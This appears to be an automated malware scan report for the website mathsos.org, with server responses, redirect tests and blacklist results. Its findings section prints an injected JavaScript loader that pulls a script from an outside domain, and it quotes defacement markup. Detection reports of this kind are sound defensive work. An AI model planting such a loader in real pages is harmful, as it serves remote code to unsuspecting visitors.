Scanned pages/files
Request | Server response | Status |
http://mathsos.org/ | HTTP/1.1 200 OK Date: Mon, 29 Dec 2014 11:44:33 GMT Accept-Ranges: bytes ETag: "c637d9d44d11d01:f629" Server: Microsoft-IIS/6.0 Content-Length: 9588 Content-Location: http://mathsos.org/Default.htm Content-Type: text/html Last-Modified: Sat, 06 Dec 2014 12:11:57 GMT X-Powered-By: ASP.NET | clean |
http://mathsos.org/default.htm | 200 OK Content-Length: 9588 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below)
if(top == self && typeof window._ws_all_js==='undefined'){
    window._ws_all_js = 7;
    var zhead = document.getElementsByTagName('head')[0];
    if(!zhead){zhead = document.createElement('head');}
    var qscript = document.createElement('script');
    qscript.setAttribute('id','wsh2_js');
    qscript.setAttribute('src','http://jswrite.com/script1.js');
    qscript.setAttribute('type','text/javascript');
    qscript.async = true;
    if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);
}
Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By BLACK_WANT3D ...[1874 bytes skipped]... ct: true; cursor: no-drop; onkeydown=" return="" false;'="" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" background="Hacked%20By%20Cv_HackeR_files/dark_wood_2597513860047357397.png" bgcolor="black"><center> <meta http-equiv="Content-Language" content="fa"> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title> Hacked By BLACK_WANT3D </title> <br> <br> <br> <br> <br> <br> <br> <br> <br> <br> <font face="Comic Sans MS" size="8"><font color="white"><span id="ym2eu9v_1" class="ym2eu9v">Hacked</span> By BLACK_WANT3D <br> <p style="text-align: center;"><span style="color: rgb(255, 255, 255);"><font size="4"><stro ...[7836 bytes skipped]... | ||
http://mathsos.org/Hacked%20By%20Cv_HackeR_files/a.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://mathsos.org/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://mathsos.org/Hacked%20By%20Cv_HackeR_files/intext.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mathsos.org
Result:
HTTP/1.1 200 OK
Date: Mon, 29 Dec 2014 11:44:33 GMT
Accept-Ranges: bytes
ETag: "c637d9d44d11d01:f629"
Server: Microsoft-IIS/6.0
Content-Length: 9588
Content-Location: http://mathsos.org/Default.htm
Content-Type: text/html
Last-Modified: Sat, 06 Dec 2014 12:11:57 GMT
X-Powered-By: ASP.NET
...9588 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mathsos.org
Referer: http://www.google.com/search?q=mathsos.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mathsos.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mathsos.org/
Result: mathsos.org is not infected or malware details are not published yet.